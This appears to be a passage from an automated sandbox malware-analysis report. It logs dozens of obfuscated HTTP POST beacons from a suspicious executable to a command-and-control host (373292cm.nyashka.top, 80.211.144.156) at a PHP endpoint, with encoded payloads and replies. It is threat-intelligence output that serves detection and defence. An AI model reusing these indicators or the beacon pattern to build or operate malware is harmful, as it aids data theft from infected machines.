                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:25.751146078 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:25.883160114 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:25 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    83 | 192.168.2.7 | 53042 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:26.009181976 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    84 | 192.168.2.7 | 53043 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:26.489444971 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 1844
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:27.143641949 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:27.268851995 CEST | 308 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    85 | 192.168.2.7 | 53044 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:26.509272099 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:27.164068937 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:27.289388895 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    86 | 192.168.2.7 | 53045 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:27.415482044 CEST | 305 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Aug 21, 2024 10:04:28.069284916 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:28.201663017 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:27 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    87 | 192.168.2.7 | 53046 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:28.654474020 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:29.319025993 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:29.512407064 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:29 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    88 | 192.168.2.7 | 53047 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:29.632169008 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:30.287446976 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:30.413641930 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:29 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    89 | 192.168.2.7 | 53048 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:30.539298058 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:31.193556070 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:31.391850948 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:30 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    90 | 192.168.2.7 | 53049 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:31.526459932 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:31.880882978 CEST2544OUTData Raw: 5f 5c 5c 50 54 48 54 5e 5b 5f 5a 51 59 55 58 5e 57 50 5d 5a 57 5b 53 59 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _\\PTHT^[_ZQYUX^WP]ZW[SYYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U._8!=^ ")-<X"(='X#??Q !R?)7X"#*/&F$.Y/-
                                                                    Aug 21, 2024 10:04:32.210042953 CEST | 25 | IN | HTTP/1.1 100 Continue


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    91 | 192.168.2.7 | 53050 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:32.277745008 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 1868
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:32.631231070 CEST1868OUTData Raw: 5a 51 5c 57 51 43 54 51 5b 5f 5a 51 59 5e 58 5f 57 5f 5d 5d 57 58 53 5a 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZQ\WQCTQ[_ZQY^X_W_]]WXSZYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-/#"=<##5*-(_<>+-[7/3!2'(9 #3%,&F$.Y/
                                                                    Aug 21, 2024 10:04:32.941917896 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:33.069655895 CEST | 308 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:32 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 09 1d 26 57 28 26 36 5d 25 2b 2c 18 25 23 25 0f 29 3d 27 12 29 2e 2a 01 24 16 2e 07 25 10 28 1c 24 28 29 10 28 58 35 09 24 3f 38 05 2d 0e 2b 5d 0c 13 22 1b 23 39 35 00 24 3c 23 01 29 3b 23 16 35 05 3a 5d 29 29 29 54 3c 3f 30 59 28 39 0d 58 2a 3a 04 1c 2c 28 04 02 39 30 08 54 34 04 2b 52 0d 11 24 55 29 3e 39 53 3d 3e 27 59 36 3b 23 5f 27 3d 31 08 32 32 26 53 27 39 2f 02 26 22 1c 0e 25 31 2a 0d 31 38 3e 5f 26 2c 39 51 21 22 23 54 2c 00 22 57 01 33 55 56
                                                                    Data Ascii: &W(&6]%+,%#%)=').*$.%($()(X5$?8-+]"#95$<#);#5:])))T<?0Y(9X*:,(90T4+R$U)>9S=>'Y6;#_'=122&S'9/&"%1*18>_&,9Q!"#T,"W3UV


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    92 | 192.168.2.7 | 53051 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:32.398319960 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:32.755793095 CEST2544OUTData Raw: 5f 5d 59 50 51 47 54 51 5b 5f 5a 51 59 55 58 54 57 5c 5d 5c 57 5e 53 58 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _]YPQGTQ[_ZQYUXTW\]\W^SXYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-/+@! )[*(](%^+?[4(#W3(*(#*,&F$.Y/-
                                                                    Aug 21, 2024 10:04:33.072755098 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:33.272763014 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:32 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    93 | 192.168.2.7 | 53052 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:33.436158895 CEST | 305 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Aug 21, 2024 10:04:33.789589882 CEST2544OUTData Raw: 5a 57 5c 52 54 42 51 5a 5b 5f 5a 51 59 51 58 53 57 5c 5d 5b 57 58 53 5f 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZW\RTBQZ[_ZQYQXSW\][WXS_YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-80 5[(]"06*<(=)_($#/+S#1(_#V%/&F$.Y/=
                                                                    Aug 21, 2024 10:04:34.090111971 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:34.217557907 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:33 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    94 | 192.168.2.7 | 53053 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:34.351901054 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:34.709054947 CEST2544OUTData Raw: 5f 54 5c 56 54 42 54 5f 5b 5f 5a 51 59 55 58 56 57 5d 5d 5b 57 5a 53 55 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _T\VTBT_[_ZQYUXVW]][WZSUYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-.#;A!-7 >>+?:+=7<3!2<P+;]4,>&F$.Y/-
                                                                    Aug 21, 2024 10:04:35.014197111 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:35.142983913 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:34 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    95 | 192.168.2.7 | 53054 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:35.274183035 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:35.630986929 CEST2544OUTData Raw: 5f 55 59 55 54 48 51 59 5b 5f 5a 51 59 50 58 57 57 5f 5d 52 57 58 53 5f 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _UYUTHQY[_ZQYPXWW_]RWXS_YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-/"73%>-$\+-<.7#,3P#2,?(" =_/&F$.Y/
                                                                    Aug 21, 2024 10:04:35.951822996 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:36.081366062 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:35 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    96 | 192.168.2.7 | 53055 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:36.243482113 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:36.599529982 CEST2544OUTData Raw: 5f 5c 59 57 54 48 51 5d 5b 5f 5a 51 59 56 58 53 57 58 5d 5f 57 50 53 5c 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _\YWTHQ][_ZQYVXSWX]_WPS\YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.,03D!? 0)4+><"<V7W#<_;Y"#5/&F$.Y/!
                                                                    Aug 21, 2024 10:04:36.921627045 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:37.055115938 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:36 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    97 | 192.168.2.7 | 53056 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:37.178802013 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:37.537033081 CEST2544OUTData Raw: 5f 54 5c 51 51 42 54 58 5b 5f 5a 51 59 53 58 55 57 5f 5d 5e 57 59 53 54 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _T\QQBTX[_ZQYSXUW_]^WYSTYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-,#8"# 2*<>[(#X <(7,*9 9_/&F$.Y/5
                                                                    Aug 21, 2024 10:04:37.870435953 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:38.003154039 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:37 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    98 | 192.168.2.7 | 53057 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:38.092103004 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 1868
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    99 | 192.168.2.7 | 53058 | 80.211.144.156 | 80 | 7840 | C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Aug 21, 2024 10:04:38.134053946 CEST | 329 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:04:38.490485907 CEST2544OUTData Raw: 5a 56 5c 5e 51 42 54 5c 5b 5f 5a 51 59 56 58 55 57 5a 5d 5d 57 58 53 55 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZV\^QBT\[_ZQYVXUWZ]]WXSUYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-/?5[#73%\)=$+==^(=$7( *9 1/&F$.Y/!
                                                                    Aug 21, 2024 10:04:38.814312935 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:04:39.142288923 CEST | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:04:38 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
